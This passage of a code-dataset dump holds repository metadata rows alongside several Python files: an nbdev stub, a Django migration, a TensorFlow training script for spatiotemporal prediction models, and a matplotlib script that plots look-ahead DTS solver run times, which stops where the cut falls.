] | null | null | null | hola_nbdev/None.py | arlingvazquez/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
] | 2 | 2021-09-28T05:35:55.000Z | 2022-02-26T10:03:49.000Z | hola_nbdev/None.py | arlingva/hola_nbdev | 6f6a114873c3d93f0bd366403a0e71cc03f7c687 | [
"Apache-2.0"
] | null | null | null |
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata")
# Cell
say_hello("pirata") | 9.2 | 19 | 0.678571 | 92 | 644 | 4.5 | 0.043478 | 0.388889 | 0.666667 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0.142857 | 644 | 70 | 20 | 9.2 | 0.75 | 0.177019 | 0 | 1 | 0 | 0 | 0.273267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a41472599b51498236d0641c4a94bf2e70d4c20c | 106 | py | Python | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | null | null | null | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | 7 | 2020-01-06T18:22:36.000Z | 2021-08-31T20:12:53.000Z | clients/models/__init__.py | vovagod/projectseven | 6a43ea8a7e057582376f6074941dca986a51f268 | [
"BSD-2-Clause"
] | null | null | null | from clients.models.clients import Clients
from clients.models.importduplication import ImportDuplication
| 35.333333 | 62 | 0.886792 | 12 | 106 | 7.833333 | 0.416667 | 0.234043 | 0.361702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 106 | 2 | 63 | 53 | 0.959184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a41585ffd9b71f957a0711f4bcbaa520a584a063 | 2,350 | py | Python | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | 1 | 2021-05-25T04:30:12.000Z | 2021-05-25T04:30:12.000Z | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | 70 | 2020-02-20T23:43:52.000Z | 2022-03-12T00:08:12.000Z | data/migrations/0005_auto_20200306_1150.py | Not-Morgan/PGDBWebServer | 9777773db763a13f168da633c69b9271f9da24b1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.9 on 2020-03-06 19:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('data', '0004_loggedaction'),
]
operations = [
migrations.AlterModelOptions(
name='student',
options={'ordering': ['active', 'last', 'first']},
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_10_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_10_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_11_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_11_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_12_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_12_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_8_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_8_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_9_T1',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
migrations.AlterField(
model_name='plistcutoff',
name='grade_9_T2',
field=models.DecimalField(decimal_places=3, default=99.999, max_digits=5),
),
]
| 34.558824 | 86 | 0.586383 | 246 | 2,350 | 5.394309 | 0.211382 | 0.150716 | 0.188395 | 0.218538 | 0.840995 | 0.840995 | 0.840995 | 0.840995 | 0.801055 | 0.801055 | 0 | 0.069319 | 0.294043 | 2,350 | 67 | 87 | 35.074627 | 0.730561 | 0.019149 | 0 | 0.672131 | 1 | 0 | 0.115936 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.016393 | 0 | 0.065574 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a477062444d49c9977f97f00dd5dae2f4d698ff8 | 9,425 | py | Python | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | train_cpu.py | Skye777/transformer | 177834bcb55e59f8ea0fbe666734c148effbec8d | [
"Apache-2.0"
] | null | null | null | """
@author: Skye Cui
@file: train_cpu.py
@time: 2021/2/20 16:35
@description:
"""
import os
os.environ["LOGURU_INFO_COLOR"] = "<green>"
import time
import re
import tensorflow as tf
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
from loguru import logger
from progress.spinner import MoonSpinner
from component.input import *
from model import UTransformer, StackConvlstm, UConvlstm
from component.loss import Loss
from hparams import Hparams
hparams = Hparams()
parser = hparams.parser
hp = parser.parse_args()
def transformer_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = UTransformer(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'transformer-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, ys_batch_train) in enumerate(train_dataset):
start = time.clock()
with tf.GradientTape() as tape:
y_predict = model([x_batch_train, ys_batch_train], training=True)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, ys_batch_train[1]])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.clock() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, ys_batch_test) in enumerate(test_dataset):
y_predict = model([x_batch_test, ys_batch_test], training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, ys_batch_test[1]])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(template.format(loss_test/count, loss_ssim_test/count, loss_l2_test/count, loss_l1_test/count))
total_epoch = int(re.findall("\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
def u_convlstm_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = UConvlstm(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'uconvlstm-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, y_batch_train) in enumerate(train_dataset):
start = time.clock()
with tf.GradientTape() as tape:
y_predict = model(x_batch_train, training=True)
print("y_pred:", y_predict.shape)
print("y_batch:", y_batch_train.shape)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_train])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.clock() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(
template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, y_batch_test) in enumerate(test_dataset):
y_predict = model(x_batch_test, training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_test])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(
template.format(loss_test / count, loss_ssim_test / count, loss_l2_test / count, loss_l1_test / count))
total_epoch = int(re.findall("\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
def convlstm_trainer():
train_dataset, test_dataset = train_input_fn()
optimizer = tf.keras.optimizers.Adam(learning_rate=hp.lr)
model = StackConvlstm(hp)
model_loss = Loss(model)
checkpoint_file = hp.ckpt
if checkpoint_file == '':
checkpoint_file = 'convlstm-ckp_0'
else:
model.load_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}')
logger.add(f"{hp.logdir}/{hp.in_seqlen}_{hp.out_seqlen}_{hp.lead_time}_train.log", enqueue=True)
for epoch in range(hp.num_epochs):
for step, (x_batch_train, y_batch_train) in enumerate(train_dataset):
start = time.clock()
with tf.GradientTape() as tape:
y_predict = model(x_batch_train, training=True)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_train])
grads = tape.gradient(loss, model.trainable_weights)
optimizer.apply_gradients(zip(grads, model.trainable_weights))
elapsed = (time.clock() - start)
template = ("step {} loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}."
"({:1.2f}s/step)")
logger.info(template.format(step, loss.numpy(), loss_ssim.numpy(), loss_l2.numpy(), loss_l1.numpy(), elapsed))
if epoch % hp.num_epoch_record == 0:
loss_test = 0
loss_ssim_test = 0
loss_l2_test = 0
loss_l1_test = 0
count = 0
spinner = MoonSpinner('Testing ')
for step, (x_batch_test, y_batch_test) in enumerate(test_dataset):
y_predict = model(x_batch_test, training=False)
loss_ssim, loss_l2, loss_l1, loss = model_loss([y_predict, y_batch_test])
loss_ssim_test += loss_ssim.numpy()
loss_l2_test += loss_l2.numpy()
loss_l1_test += loss_l1.numpy()
loss_test += loss.numpy()
count += 1
spinner.next()
spinner.finish()
logger.info("TEST COMPLETE!")
template = ("TEST DATASET STATISTICS: "
"loss is {:1.5f}, "
"loss ssim is {:1.5f}, "
"loss l2 is {:1.5f}, "
"loss l1 is {:1.5f}.")
logger.info(template.format(loss_test/count, loss_ssim_test/count, loss_l2_test/count, loss_l1_test/count))
total_epoch = int(re.findall("\d+", checkpoint_file)[0])
checkpoint_file = checkpoint_file.replace(f'_{total_epoch}', f'_{total_epoch + 1}')
model.save_weights(f'{hp.single_gpu_model_dir}/{checkpoint_file}', save_format='tf')
logger.info("Saved checkpoint_file {}".format(checkpoint_file))
if __name__ == '__main__':
# transformer_trainer()
# u_convlstm_trainer()
convlstm_trainer()
| 43.233945 | 122 | 0.576764 | 1,178 | 9,425 | 4.334465 | 0.118846 | 0.082256 | 0.023502 | 0.031727 | 0.880924 | 0.880924 | 0.879358 | 0.879358 | 0.879358 | 0.879358 | 0 | 0.023245 | 0.301645 | 9,425 | 217 | 123 | 43.43318 | 0.752507 | 0.012626 | 0 | 0.803279 | 0 | 0.016393 | 0.152001 | 0.049376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016393 | false | 0 | 0.054645 | 0 | 0.071038 | 0.010929 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4844ed1b27b7993515d0ab8ac066e478d8a92f4 | 20,607 | py | Python | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | 1 | 2021-11-18T02:46:34.000Z | 2021-11-18T02:46:34.000Z | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | null | null | null | plotter/agg_01_d030_lookahead_dts_runtime.py | kit-tm/fdeval | f6463c1c7549b8ac7fc39854e87c88d3cac858a0 | [
"BSD-2-Clause"
] | null | null | null | import logging, math, json, pickle, os
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.dates as mdates
from datetime import datetime
import matplotlib.patches as patches
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.gridspec as gridspec
import statistics
logger = logging.getLogger(__name__)
from . import agg_2_utils as utils
SHOW_OUTLIERS = False
LOOKAHEAD = [1,2,3,4,5,6,7,8,9]
DATASET_TYPE = 0
def plot(blob, **kwargs):
"Plot look-ahead DTS"
utils.EXPORT_BLOB = blob
macros_ports = []
macros_total = []
total = {}
total_infeasable = {}
data_per_port = {}
includes = ['scenario_switch_cnt', 'scenario_table_capacity',
'scenario_concentrated_switches', 'scenario_edges', 'scenario_bottlenecks',
'scenario_hosts_of_switch']
includes += blob.find_columns('solver_stats_time_modeling')
includes += blob.find_columns('solver_stats_time_solving')
includes += blob.find_columns('timer')
includes += blob.find_columns('hit_timelimit')
# 15 is the maximum number if switches in current experiments; (id 0-14)
for switch_cnt in range(0, 15):
includes.append('dts_%d_solver_cnt_feasable' % (switch_cnt))
includes.append('dts_%d_solver_cnt_infeasable' % (switch_cnt))
includes.append('dts_%d_solver_considered_ports' % (switch_cnt))
includes.append('dts_%d_ctrl_overhead' % (switch_cnt))
includes.append('dts_%d_link_overhead' % (switch_cnt))
includes.append('dts_%d_table_overhead' % (switch_cnt))
includes.append('dts_%d_table_datay_raw' % (switch_cnt))
includes.append('dts_%d_ctrl_overhead_percent' % (switch_cnt))
includes.append('dts_%d_link_overhead_percent' % (switch_cnt))
includes.append('dts_%d_table_overhead_percent' % (switch_cnt))
includes.append('dts_%d_underutil_percent' % (switch_cnt))
blob.include_parameters(**dict.fromkeys(includes, 1))
runs = blob.filter(**dict())
# -----------------------
# prepare data for plotting
# -----------------------
DATA = {}
seeds = []
timercnt = 0
for run in runs:
seed = run.get('param_topo_seed')
param_dts_algo = run.get('param_dts_algo')
param_dts_look_ahead = run.get('param_dts_look_ahead')
if not seed in seeds:
seeds.append(seed)
if not DATA.get(param_dts_algo):
DATA[param_dts_algo] = {}
for switch in range(0, run.get('scenario_switch_cnt')):
if not DATA[param_dts_algo].get((seed, switch)):
DATA[param_dts_algo][(seed, switch)] = {}
DATA[param_dts_algo][(seed, switch)][param_dts_look_ahead] = run
# -----------------------
# Figure: modeling and solving time dts based on look-ahead 1..9 or 1..30
# -----------------------
if 1:
for factor_limit in [9,30]:
for param_dts_algo, DATA1 in DATA.items():
if param_dts_algo== 1 and factor_limit == 30:
continue
plt.close()
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
color = 'red'
label = 'Select-Opt'
if param_dts_algo == 2:
color = 'blue'
label = 'Select-CopyFirst'
# for this plot, we can only use data where all look-ahead values
# were calculated without timeouts!
use_data = {}
ignore_seeds = []
for seedswitch, DATA2 in DATA1.items():
use = True
seed, switch = seedswitch
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('hit_timelimit'):
use = False
if run.get('dts_%d_ctrl_overhead_percent' % (switch)) == None:
use = False
if use == False:
if not seed in ignore_seeds:
ignore_seeds.append(seed)
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
if seed not in ignore_seeds:
use_data[seedswitch] = DATA2
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in use_data.items():
seed, switch = seedswitch
print(seed, switch)
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
if run.get('dts_%d_solver_cnt_infeasable' % (switch)) == 0:
solver_stats_time_solving = run.get('dts_%d_solver_stats_time_solving' % (switch))
solver_stats_time_modeling = run.get('dts_%d_solver_stats_time_modeling' % (switch))
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo, len(result_solver_stats_time_solving))
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
if param_dts_look_ahead <= factor_limit:
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
print("len", len(databox), len(datax))
axes[1].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
if param_dts_look_ahead <= factor_limit:
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[0].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
if factor_limit > 9:
for ax in fig.axes:
labels = []
for x in range(1,factor_limit):
if x % 2 == 1:
labels.append(''+str(x))
else:
labels.append('')
ax.set_xticklabels(labels)
#h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2, l2, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.88)
utils.export(fig, 'lookahead_%d_dts_%d_solving.pdf' % (factor_limit, param_dts_algo), folder='lookahead')
# -----------------------
# Figure: rsa times for L=1 to L=30
# -----------------------
if 1:
use_data = {}
for run in runs:
if run.get('param_dts_algo') != 2:
continue
seed = run.get('param_topo_seed')
param_dts_look_ahead = run.get('param_dts_look_ahead')
if not use_data.get((param_dts_look_ahead, seed)):
use_data[(param_dts_look_ahead, seed)] = []
use_data[(param_dts_look_ahead, seed)].append(run)
if len(use_data) > 0:
plt.close()
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
color = 'blue'
label = 'Select-CopyFirst'
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for key, runs in sorted(use_data.items()):
param_dts_look_ahead, seed = key
for run in runs:
solver_stats_time_solving = run.get('rsa_solver_stats_time_solving')
solver_stats_time_modeling = run.get('rsa_solver_stats_time_modeling')
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[1].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
databox = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
databox.append(data)
axes[0].boxplot(databox, positions=datax, notch=False, showfliers=False)
axes[0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
for ax in fig.axes:
labels = []
for x in range(1,30):
if x % 2 == 1:
labels.append(''+str(x))
else:
labels.append('')
ax.set_xticklabels(labels)
#h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2, l2, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.88)
utils.export(fig, 'lookahead_rsa30.pdf', folder='lookahead')
# -----------------------
# Figure: modeling and solving time based on look-ahead
# -----------------------
if 0:
plt.close()
fig, axes = plt.subplots(2, 2, figsize=(12, 7))
fig.tight_layout(pad=3)
for ax, label in zip(fig.axes, [r'Modeling time (ms)', r'Solving time (ms)']*2):
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('%s' % label, fontsize=15)
for ax in fig.axes:
ax.set_xlim(1,9)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
for param_dts_algo, DATA1 in DATA.items():
color = 'red'
label = 'Select-Opt'
if param_dts_algo == 2:
color = 'blue'
label = 'Select-CopyFirst'
# for this plot, we can only use data where all look-ahead values
# were calculated without timeouts!
use_data = {}
ignore_seeds = []
for seedswitch, DATA2 in DATA1.items():
use = True
seed, switch = seedswitch
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('hit_timelimit'):
use = False
if run.get('dts_%d_ctrl_overhead_percent' % (switch)) == None:
use = False
if use == False:
if not seed in ignore_seeds:
ignore_seeds.append(seed)
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
if seed not in ignore_seeds:
use_data[seedswitch] = DATA2
result_solver_stats_time_solving = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in use_data.items():
seed, switch = seedswitch
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
if run.get('dts_%d_solver_cnt_infeasable' % (switch)) == 0:
solver_stats_time_solving = run.get('dts_%d_solver_stats_time_solving' % (switch))
solver_stats_time_modeling = run.get('dts_%d_solver_stats_time_modeling' % (switch))
solver_stats_time_solving = statistics.mean(solver_stats_time_solving) * 1000
solver_stats_time_modeling = statistics.mean(solver_stats_time_modeling) * 1000
try:
result_solver_stats_time_solving[param_dts_look_ahead].append(solver_stats_time_solving)
except KeyError:
result_solver_stats_time_solving[param_dts_look_ahead] = [solver_stats_time_solving]
try:
result_solver_stats_time_modeling[param_dts_look_ahead].append(solver_stats_time_modeling)
except KeyError:
result_solver_stats_time_modeling[param_dts_look_ahead] = [solver_stats_time_modeling]
print("")
print("solving time", param_dts_algo)
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_solving.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
axes[param_dts_algo-1][1].boxplot(result_solver_stats_time_solving.values(), positions=datax, notch=False, showfliers=False)
axes[param_dts_algo-1][1].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
print("")
print("modeling time", param_dts_algo)
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_stats_time_modeling.items()):
print(" ", param_dts_look_ahead, np.percentile(data, 50), np.percentile(data, 75), np.percentile(data, 99))
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
axes[param_dts_algo-1][0].boxplot(result_solver_stats_time_modeling.values(), positions=datax, notch=False, showfliers=False)
axes[param_dts_algo-1][0].plot(datax, datay, color=color, marker='*', linestyle="--", linewidth=2, label=label)
h1, l1 = fig.axes[-1].get_legend_handles_labels()
h2, l2 = fig.axes[0].get_legend_handles_labels()
fig.legend(h2+h1, l2+l1, loc='upper center', ncol=2, fontsize=16)
fig.subplots_adjust(top=0.90)
utils.export(fig, 'lookahead_dts_solving_times.pdf', folder='lookahead')
exit(1)
# -----------------------
# Figure: infeasible solutions based on look-ahead
# -----------------------
if 0:
plt.close()
fig, ax = plt.subplots(figsize=(10, 4))
fig.tight_layout(pad=2.7)
ax.xaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.yaxis.grid(True, color='grey', linestyle='--', linewidth=1, alpha=0.5)
ax.set_xlabel('Look-ahead factor L', fontsize=15)
ax.set_ylabel('Infeasible solutions', fontsize=15)
for param_dts_algo, DATA1 in DATA.items():
color = 'red'
if param_dts_algo == 1:
color = 'blue'
continue
result_solver_cnt_infeasable = {}
result_solver_stats_time_modeling = {}
for seedswitch, DATA2 in DATA1.items():
seed, switch = seedswitch
datax = []
datay = []
for param_dts_look_ahead, run in sorted(DATA2.items()):
if run.get('dts_%d_table_overhead_percent' % (switch)) == 0:
continue
solver_cnt_infeasable = run.get('dts_%d_solver_cnt_infeasable' % (switch))
if solver_cnt_infeasable > 0:
try:
result_solver_cnt_infeasable[param_dts_look_ahead].append(solver_cnt_infeasable)
except KeyError:
result_solver_cnt_infeasable[param_dts_look_ahead] = [solver_cnt_infeasable]
datax = []
datay = []
for param_dts_look_ahead, data in sorted(result_solver_cnt_infeasable.items()):
datax.append(param_dts_look_ahead)
datay.append(statistics.median(data))
